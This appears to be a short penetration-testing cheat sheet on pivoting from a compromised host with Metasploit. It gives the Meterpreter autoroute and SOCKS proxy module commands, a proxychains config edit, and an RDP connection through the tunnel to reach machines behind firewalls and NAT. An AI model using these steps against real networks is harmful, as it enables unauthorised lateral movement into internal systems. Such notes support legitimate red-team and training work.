MetaSploit

We’ll use reverse proxying to access machines that are protected by edge firewalls and Network Address Translation (NAT) configs

From Meterpreter

Send session to background

use multi/manage/autoroute
set session 1
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 4a
exploit -j

The autoroute module creates a reverse tunnel and allows us to direct network traffic into the appropriate subnet

Add socks config to conf file

sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains4.conf'

can now rdp

proxychains rdesktop 192.168.220.129

The route created by Meterpreter also allows us to access any other computer on that internal network.

Having issues or need Socks5 for support for GoBuster? change the following 4 -> 5

set version 5 (for Metasploit module)

socks5 127.0.0.1 1080 (for config file)

Last updated